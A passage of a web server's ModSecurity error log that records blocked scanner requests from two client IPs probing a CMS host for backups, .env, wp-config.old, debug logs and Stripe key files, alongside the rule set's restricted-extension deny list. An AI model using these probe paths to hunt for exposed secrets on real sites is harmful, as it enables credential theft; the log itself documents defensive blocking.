"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/conf/conf.zip"] [unique_id "aa2sLH-dmvIeGeY060kiwAAAAcg"] [Sun Mar 08 19:04:44.073684 2026] [:error] [pid 13471:tid 13498] [client 35.189.151.148:40620] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp.zip"] [unique_id "aa2sLL8gLDtA4xTIJqD4fwAAABc"] [Sun Mar 08 19:04:44.274250 2026] [:error] [pid 13471:tid 13492] [client 35.189.151.148:40252] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-20240527.zip"] [unique_id "aa2sLL8gLDtA4xTIJqD4gQAAABE"] [Sun Mar 08 19:04:44.472981 2026] [:error] [pid 13471:tid 13484] [client 35.189.151.148:37464] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_rds_snapshot.zip"] [unique_id "aa2sLL8gLDtA4xTIJqD4gwAAAAk"] [Sun Mar 08 19:04:44.475141 2026] [:error] [pid 13471:tid 13477] [client 35.189.151.148:44132] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sqlite.zip"] [unique_id "aa2sLL8gLDtA4xTIJqD4hAAAAAI"] [Mon Mar 09 04:04:03.277648 2026] [:error] [pid 27110:tid 27159] [client 185.177.72.60:11244] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aa4qk60D85rsy26gHPOeFgAAABI"] [Mon Mar 09 04:04:03.384037 2026] [:error] [pid 27110:tid 27165] [client 185.177.72.60:4766] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aa4qk60D85rsy26gHPOeGAAAABg"] [Mon Mar 09 04:04:04.694189 2026] [access_compat:error] [pid 27112:tid 27198] [client 185.177.72.60:5080] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Mon Mar 09 04:04:05.885277 2026] [access_compat:error] [pid 6189:tid 6293] [client 185.177.72.60:11360] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Mon Mar 09 04:04:17.375585 2026] [:error] [pid 6874:tid 6884] [client 185.177.72.60:33992] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.old"] [unique_id "aa4qob8eGXOlBYlBBTDQ4wAAAYQ"] [Mon Mar 09 04:04:17.497233 2026] [:error] [pid 6874:tid 6899] [client 185.177.72.60:33992] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aa4qob8eGXOlBYlBBTDQ5AAAAZM"] [Mon Mar 09 04:04:25.082607 2026] [:error] [pid 6874:tid 6890] [client 185.177.72.60:17350] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.key"] [unique_id "aa4qqb8eGXOlBYlBBTDQ9wAAAYo"] [Mon Mar 09 04:04:25.177010 2026] [:error] [pid 7058:tid 7088] [client 185.177.72.60:17264] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/wp-config.old"] [unique_id "aa4qqbwNmNAC0qtA2OKPNwAAAdY"] [Mon Mar 09 04:04:25.239047 2026] [:error] [pid 6874:tid 6900] [client 185.177.72.60:17532] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aa4qqb8eGXOlBYlBBTDQ-QAAAZQ"] [Mon Mar 09 04:04:25.687121 2026] [:error] [pid 27110:tid 27162] [client 185.177.72.60:17564] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.conf"] [unique_id "aa4qqa0D85rsy26gHPOergAAABU"] [Mon Mar 09 04:04:26.335513 2026] [:error] [pid 6874:tid 6883] [client 185.177.72.60:17552] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.log"] [unique_id "aa4qqr8eGXOlBYlBBTDRAAAAAYM"] [Mon Mar 09 04:04:26.539716 2026] [:error] [pid 27110:tid 27158] [client 185.177.72.60:17564] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.bak"] [unique_id "aa4qqq0D85rsy26gHPOetQAAABE"] [Mon Mar 09 04:04:27.381588 2026] [:error] [pid 28169:tid 28192] [client 185.177.72.60:17762] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.backup"] [unique_id "aa4qqzqd34JOYUSZduj92gAAANU"] [Mon Mar 09 04:04:27.542280 2026] [:error] [pid 28169:tid 28181] [client 185.177.72.60:17684] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.ini"] [unique_id "aa4qqzqd34JOYUSZduj93AAAAMo"] [Mon Mar 09 04:04:27.999014 2026] [:error] [pid 7259:tid 7267] [client 185.177.72.60:17754] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.old"] [unique_id "aa4qq5ifH2twR9cBzzfw0wAAAgA"] [Mon Mar 09 04:04:28.146138 2026] [:error] [pid 7259:tid 7275] [client 185.177.72.60:17876] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.key"] [unique_id "aa4qrJifH2twR9cBzzfw1gAAAgg"] [Mon Mar 09 04:04:28.178905 2026] [:error] [pid 7259:tid 7269] [client 185.177.72.60:17876] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.ini"] [unique_id "aa4qrJifH2twR9cBzzfw1wAAAgI"] [Mon Mar 09 04:04:28.984173 2026] [:error] [pid 7259:tid 7275] [client 185.177.72.60:17876] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.old"] [unique_id "aa4qrJifH2twR9cBzzfw3QAAAgg"] [Mon Mar 09 04:04:28.994613 2026] [:error] [pid 7259:tid 7267] [client 185.177.72.60:17914] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.log"] [unique_id "aa4qrJifH2twR9cBzzfw3gAAAgA"] [Mon Mar 09 04:04:29.001093 2026] [:error] [pid 7259:tid 7271] [client 185.177.72.60:17920] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.conf"] [unique_id "aa4qrZifH2twR9cBzzfw4AAAAgQ"] [Mon Mar 09 04:04:29.359048 2026] [:error] [pid 6734:tid 6758] [client 185.177.72.60:17922] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.bak"] [unique_id "aa4qrUyJ0iyCmxAaPczHjAAAAVE"] [Mon Mar 09 04:04:29.763843 2026] [:error] [pid 7259:tid 7267] [client 185.177.72.60:17914] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/stripe.backup"] [unique_id "aa4qrZifH2twR9cBzzfw5QAAAgA"] [Mon Mar 09 04:04:33.678204 2026] [:error] [pid 6874:tid 6891] [client 185.177.72.60:17350] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 